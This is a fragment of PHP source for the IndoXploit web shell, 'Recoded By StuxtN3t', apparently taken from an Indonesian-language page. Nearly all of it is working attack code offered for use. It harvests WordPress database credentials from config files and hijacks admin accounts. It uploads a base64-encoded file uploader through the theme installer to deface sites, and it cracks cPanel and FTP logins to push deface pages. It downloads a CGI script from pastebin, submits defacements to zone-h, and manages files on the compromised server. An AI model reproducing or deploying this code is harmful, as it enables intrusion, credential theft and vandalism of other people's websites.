"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif($_GET['do'] == 'auto_wp') { if($_POST['hajar']) { $title = htmlspecialchars($_POST['new_title']); $pn_title = str_replace(" ", "-", $title); if($_POST['cek_edit'] == "Y") { $script = $_POST['edit_content']; } else { $script = $title; } $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."posts"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "
"; if($target == '') { echo "URL: error, gabisa ambil nama domain nya -> "; } else { echo "URL: $target/?p=$id -> "; } if(!$update OR !$conn OR !$db) { echo "MySQL Error: ".mysql_error()."
"; } else { echo "sukses di ganti.
"; } echo "

"; mysql_close($conn); } } } else { echo "

Auto Edit Title+Content WordPress


DIR Config:


Set Title:


Edit Content?: YN
Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.

NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'zoneh') { if($_POST['submit']) { $domain = explode("\r\n", $_POST['url']); $nick = $_POST['nick']; echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
"; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

"; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { echo "$url -> OK
"; } else { echo "$url -> ERROR
"; } } } else { echo "
Defacer:

Domains:

"; } echo "
"; }elseif($_GET['do'] == 'cpftp_auto') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == '' || $pcp == '') { // } else { echo "[+] username ($ucp) password ($pcp)
"; $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST'])); $ftp_login = ftp_login($ftp_conn, $ucp, $pcp); if((!$ftp_login) || (!$ftp_conn)) { echo "[+] Login Gagal

"; } else { echo "[+] Login Sukses
"; $fi = htmlspecialchars($_POST['file_deface']); $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY); if($deface) { $i++; echo "[+] Deface Sukses
"; if(function_exists('posix_getpwuid')) { $domain_cp = file_get_contents("/etc/named.conf"); if($domain_cp == '') { echo "[+] gabisa ambil nama domain nya

"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_cp_url = $user_cp_url['name']; if($user_cp_url == $ucp) { echo "[+] http://$dj/$fi

"; break; } } } } else { echo "[+] gabisa ambil nama domain nya

"; } } else { echo "[-] Deface Gagal

"; } } //echo "username ($ucp) password ($pcp)
"; } } } } } if($i == 0) { } else { echo "
Sukses Deface ".$i." Cpanel by GBrother."; } } else { echo "
Filename:

Deface Page:

USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'cgi') { $cgi_dir = mkdir('idx_cgi', 0755); $file_cgi = "idx_cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); $cgi = fopen($file_cgi, "w"); fwrite($cgi, $cgi_script); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); echo ""; } elseif($_GET['do'] == 'fake_root') { ob_start(); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk."\n"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach($site as $url) { $cek = cek("$url/~$user/$file"); if(preg_match("/hacked/i", $cek)) { echo "URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "
Filename:

User:

Domain:


NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
"; } } elseif($_GET['do'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "
-> adminer login <-
"; } else { if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { echo "
-> adminer login <-
"; } else { echo "
gagal buat file adminer
"; } } }elseif($_GET['do'] == 'passwbypass') { echo '
Bypass etc/passw With:












Bypass User With :












'; if ($_POST['awkuser']) { echo"
"; } if ($_POST['systuser']) { echo"
"; } if ($_POST['passthuser']) { echo"
"; } if ($_POST['exuser']) { echo"
"; } if ($_POST['shexuser']) { echo"
"; } if($_POST['syst']) { echo"


"; } if($_POST['passth']) { echo"


"; } if($_POST['ex']) { echo"


"; } if($_POST['shex']) { echo"


"; } echo '
'; if($_POST['melex']) { echo"

"; } // // } elseif($_GET['do'] == 'auto_dwp') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $scan = $_POST['link_config']; $link_config = scandir($scan); $script = htmlspecialchars($_POST['script']); $user = "StuxtN3t"; $pass = "StuxtN3t"; $passx = md5($pass); foreach($link_config as $dir_config) { if(!is_file("$scan/$dir_config")) continue; $config = file_get_contents("$scan/$dir_config"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION, true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } } else { echo "

WordPress Auto Deface





NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'auto_dwp2') { if($_POST['auto_deface_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } function lohgin($cek, $web, $userr, $pass, $wp_submit) { $post = array( "log" => "$userr", "pwd" => "$pass", "rememberme" => "forever", "wp-submit" => "$wp_submit", "redirect_to" => "$web", "testcookie" => "1", ); $ch = curl_init($cek); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $script = htmlspecialchars($_POST['script']); $user = "indoxploit"; $pass = "indoxploit"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[+] $target
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { $site = "$target/wp-login.php"; $site2 = "$target/wp-admin/theme-install.php?upload"; $b1 = anucurl($site2); $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); $b = lohgin($site, $site2, $user, $pass, $wp_sub); $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); $www = "m.php"; $fp5 = fopen($www,"w"); fputs($fp5,$upload3); $post2 = array( "_wpnonce" => "$anu2", "_wp_http_referer" => "/wp-admin/theme-install.php?upload", "themezip" => "@$www", "install-theme-submit" => "Install Now", ); $ch = curl_init("$target/wp-admin/update.php?action=upload-theme"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post2); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data3 = curl_exec($ch); curl_close($ch); $y = date("Y"); $m = date("m"); $namafile = "id.php"; $fpi = fopen($namafile,"w"); fputs($fpi,$script); $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www"); curl_setopt($ch6, CURLOPT_POST, true); curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile")); curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt"); curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch6, CURLOPT_COOKIESESSION,true); $postResult = curl_exec($ch6); curl_close($ch6); $as = "$target/k.php"; $bs = anucurl($as); if(preg_match("#$script#is", $bs)) { echo "[+] berhasil mepes...
"; echo "[+] $as

"; } else { echo "[-] gagal mepes...
"; echo "[!!] coba aja manual:
"; echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; } mysql_close($conn); } } } else { echo "

WordPress Auto Deface V.2


Link Config:


"; } } elseif($_GET['act'] == 'newfile') { if($_POST['new_save_file']) { $newfile = htmlspecialchars($_POST['newfile']); $fopen = fopen($newfile, "a+"); if($fopen) { $act = ""; } else { $act = "permission denied"; } } echo $act; echo "
Filename:
"; } elseif($_GET['act'] == 'newfolder') { if($_POST['new_save_folder']) { $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']); if(!mkdir($new_folder)) { $act = "permission denied"; } else { $act = ""; } } echo $act; echo "
Folder Name:
"; } elseif($_GET['act'] == 'rename_dir') { if($_POST['dir_rename']) { $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename']).""); if($dir_rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "
"; } elseif($_GET['act'] == 'delete_dir') { function Delete($path) { if (is_dir($path) === true) { $files = array_diff(scandir($path), array('.', '..')); foreach ($files as $file) { Delete(realpath($path) . '/' . $file); } return rmdir($path); } else if (is_file($path) === true) { return unlink($path); } return false; } $delete_dir = Delete($dir); if($delete_dir) { $act = ""; } else { $act = "could not remove ".basename($dir).""; } echo $act; } elseif($_GET['act'] == 'view') { echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo ""; } elseif($_GET['act'] == 'edit') { if($_POST['save']) { $save = file_put_contents($_GET['file'], $_POST['src']); if($save) { $act = "Saved!"; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "

"; } elseif($_GET['act'] == 'rename') { if($_POST['do_rename']) { $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); if($rename) { $act = ""; } else { $act = "permission denied"; } echo "".$act."
"; } echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
"; echo "
"; } elseif($_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if($delete) { $act = ""; } else { $act = "permission denied"; } echo $act; }else { if(is_dir($dir) == true) { echo ''; $scandir = scandir($dir); foreach($scandir as $dirx) { $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if(!is_dir("$dir/$dirx")) continue; if($dirx === '..') { $href = "$dirx"; } elseif($dirx === '.') { $href = "$dirx"; } else { $href = "$dirx"; } if($dirx === '.' || $dirx === '..') { $act_dir = "newfile | newfolder"; } else { $act_dir = "rename | delete"; } echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo ""; foreach($scandir as $file) { $ftype = filetype("$dir/$file"); $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); $size = filesize("$dir/$file")/1024; $size = round($size,3); if($size > 1024) { $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } if(!is_file("$dir/$file")) continue; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; } echo "


























Name
Type
Size
Last Modified
Permission
Action
$dtype
-
"; echo "
$dtime
".w("$dir/$dirx",perms("$dir/$dirx"))."
$act_dir
$file
$ftype
$size
$ftime
".w("$dir/$file",perms("$dir/$file"))."
edit | rename | delete | download

"; } else { echo "can't open directory"; } } echo "

Copyright © ".date("Y")." - IndoXploit Shell Recoded By StuxtN3t
"; ?>


x

Diskusi

Belum ada diskusi

Mulai berdiskusi

Anda harus login terlebih dahulu untuk berkomentar. Klik di sini untuk login.